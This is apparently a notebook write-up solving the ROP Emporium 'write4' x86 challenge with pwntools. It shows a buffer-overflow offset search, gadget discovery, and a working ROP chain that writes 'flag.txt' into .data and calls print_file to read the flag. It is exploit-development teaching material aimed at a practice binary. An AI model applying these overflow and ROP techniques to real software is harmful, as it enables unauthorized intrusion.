# Solution for Write 4 ROP Emporium using pwntools

In [1]:
import pwn 
from pwn import *

Lets analyse the binary first
See what we're dealing with
```text
┌──(hanoz㉿kali)-[~/Desktop/ropemporium/write4/write432]
└─ file write432 
write432: ELF 32-bit LSB executable, 
```
Next let's check the options on the binary
```text
gdb-peda checksec
CANARY    : disabled
FORTIFY   : disabled
NX        : ENABLED
PIE       : disabled
RELRO     : Partial
```
We can see that NX is enabled. So we can't inject shellcode on the stack.
Now let's see what functions are there and let's try to understand how everything works
```text
0x08048506  main
0x0804852a  usefulFunction
0x08048543  usefulGadgets
0x080483b0  pwnme@plt
```
Okie then 
main is calling pwnme.
The pwnme function and the print_file function are not showing up in our ghidra because they are not in the same binary, we are linking it in runtime to a libwrite432.so file, which sort of acts like how libc does.

Okay so the pwnme function takes a buffer of size 36 and at this point the buffer overflow is easy
Now let's just get the offset and see what to do.

In [2]:
p = process('./write432')
elf = ELF('./write432')
rop = ROP(elf)

[x] Starting local process './write432'
[+] Starting local process './write432': pid 23659
[*] '/home/hanoz/Desktop/ropemporium/write4/write432/write432'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
    RUNPATH:  b'.'
[*] Loaded 10 cached gadgets for './write432'


In [3]:
init_recvd = p.recv()
print(init_recvd)

b'write4 by ROP Emporium\nx86\n\nGo ahead and give me the input already!\n\n> '


Alright so 
The usefulGadgets function has a mov [edi],ebp It moves the value of ebp into the address contained by EDI
So now if we can pop edi; pop ebp and then write the address of the area we want to write, and then write the string, we can theoretically write directly to memory. 
First we need to decide which section of memory we want to write to
We use radare2 for that
```text
[0x080484d0]> iS
[Sections]

nth paddr        size vaddr       vsize perm name
―――――――――――――――――――――――――――――――――――――――――――――――――
0   0x00000000    0x0 0x00000000    0x0 ---- 
1   0x00000154   0x13 0x08048154   0x13 -r-- .interp
2   0x00000168   0x20 0x08048168   0x20 -r-- .note.ABI-tag
3   0x00000188   0x24 0x08048188   0x24 -r-- .note.gnu.build-id
4   0x000001ac   0x3c 0x080481ac   0x3c -r-- .gnu.hash
5   0x000001e8   0xb0 0x080481e8   0xb0 -r-- .dynsym
6   0x00000298   0x8b 0x08048298   0x8b -r-- .dynstr
7   0x00000324   0x16 0x08048324   0x16 -r-- .gnu.version
8   0x0000033c   0x20 0x0804833c   0x20 -r-- .gnu.version_r
9   0x0000035c    0x8 0x0804835c    0x8 -r-- .rel.dyn
10  0x00000364   0x18 0x08048364   0x18 -r-- .rel.plt
11  0x0000037c   0x23 0x0804837c   0x23 -r-x .init
12  0x000003a0   0x40 0x080483a0   0x40 -r-x .plt
13  0x000003e0    0x8 0x080483e0    0x8 -r-x .plt.got
14  0x000003f0  0x1c2 0x080483f0  0x1c2 -r-x .text
15  0x000005b4   0x14 0x080485b4   0x14 -r-x .fini
16  0x000005c8   0x14 0x080485c8   0x14 -r-- .rodata
17  0x000005dc   0x44 0x080485dc   0x44 -r-- .eh_frame_hdr
18  0x00000620  0x114 0x08048620  0x114 -r-- .eh_frame
19  0x00000efc    0x4 0x08049efc    0x4 -rw- .init_array
20  0x00000f00    0x4 0x08049f00    0x4 -rw- .fini_array
21  0x00000f04   0xf8 0x08049f04   0xf8 -rw- .dynamic
22  0x00000ffc    0x4 0x08049ffc    0x4 -rw- .got
23  0x00001000   0x18 0x0804a000   0x18 -rw- .got.plt
24  0x00001018    0x8 0x0804a018    0x8 -rw- .data
25  0x00001020    0x0 0x0804a020    0x4 -rw- .bss
26  0x00001020   0x29 0x00000000   0x29 ---- .comment
27  0x0000104c  0x440 0x00000000  0x440 ---- .symtab
28  0x0000148c  0x211 0x00000000  0x211 ---- .strtab
29  0x0000169d  0x105 0x00000000  0x105 ---- .shstrtab
```
Okay we can see there are 8 bytes free in data. We can write in that and we can get the address also for that if we were doing it manually.
Then we need to find the gadgets. Let's try and use pwntools for that 

In [4]:
pprint(rop.gadgets)

{134513542: Gadget(0x8048386, ['ret'], [], 0x4),
 134513562: Gadget(0x804839a, ['add esp, 8', 'pop ebx', 'ret'], ['ebx'], 0x10),
 134513565: Gadget(0x804839d, ['pop ebx', 'ret'], ['ebx'], 0x8),
 134513778: Gadget(0x8048472, ['add esp, 0x10', 'leave', 'ret'], ['ebp', 'esp'], 0x2540be413),
 134513781: Gadget(0x8048475, ['leave', 'ret'], ['ebp', 'esp'], 0x2540be403),
 134514085: Gadget(0x80485a5, ['add esp, 0xc', 'pop ebx', 'pop esi', 'pop edi', 'pop ebp', 'ret'], ['ebx', 'esi', 'edi', 'ebp'], 0x20),
 134514088: Gadget(0x80485a8, ['pop ebx', 'pop esi', 'pop edi', 'pop ebp', 'ret'], ['ebx', 'esi', 'edi', 'ebp'], 0x14),
 134514089: Gadget(0x80485a9, ['pop esi', 'pop edi', 'pop ebp', 'ret'], ['esi', 'edi', 'ebp'], 0x10),
 134514090: Gadget(0x80485aa, ['pop edi', 'pop ebp', 'ret'], ['edi', 'ebp'], 0xc),
 134514091: Gadget(0x80485ab, ['pop ebp', 'ret'], ['ebp'], 0x8)}


Since our instruction above only moves from edi to ebp, we can safely think of using 0x80485aa <- This gadget
It does exactly what we need it to. We then need to append the data address and then we need to append the 4 byte string. repeat that again for another 4 bytes. First let's get the address of the data section using pwntools

In [5]:
movtomem_operation_addr = elf.symbols['usefulGadgets'] #THIS IS AN ADDRESS BTW
pop_operation_rop = rop.find_gadget(["pop edi", "pop ebp", "ret"])[0]
data_loc_addr = elf.symbols.data_start
#print(hex(data_loc_addr))

## NOW Let's make the ROP Chain

In [15]:
rop.raw([pop_operation_rop, data_loc_addr , b'flag', movtomem_operation_addr]) #AS WE ARE ONLY WRITING 4 BYTES
rop.raw([pop_operation_rop,data_loc_addr+0x4, b'.txt',movtomem_operation_addr])
rop.print_file(data_loc_addr)
rop_chain = rop.chain()

In [4]:
x = 50
payload = cyclic(x,n=4) 
p.sendline(payload)

p.wait()
core = p.corefile

offset = cyclic_find(core.fault_addr)
log.success("We have found the offset at location " + str(offset))

[*] Process './write432' stopped with exit code -11 (SIGSEGV) (pid 19432)
[x] Parsing corefile...
[*] '/home/hanoz/Desktop/ropemporium/write4/write432/core.19432'
    Arch:      i386-32-little
    EIP:       0x6161616c
    ESP:       0xffdd7760
    Exe:       '/home/hanoz/Desktop/ropemporium/write4/write432/write432' (0x8048000)
    Fault:     0x6161616c
[+] Parsing corefile...: Done
[+] We have found the offset at location 44


In [16]:
buffer = b"A"*44
payload = buffer + rop_chain
p.sendline(payload)

In [17]:
res = p.recvuntil("}")
print(res)

[*] Process './write432' stopped with exit code -11 (SIGSEGV) (pid 23659)
b'Thank you!\nROPE{a_placeholder_32byte_flag!}'


/tmp/ipykernel_23645/1883862293.py:1: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  res = p.recvuntil("}")
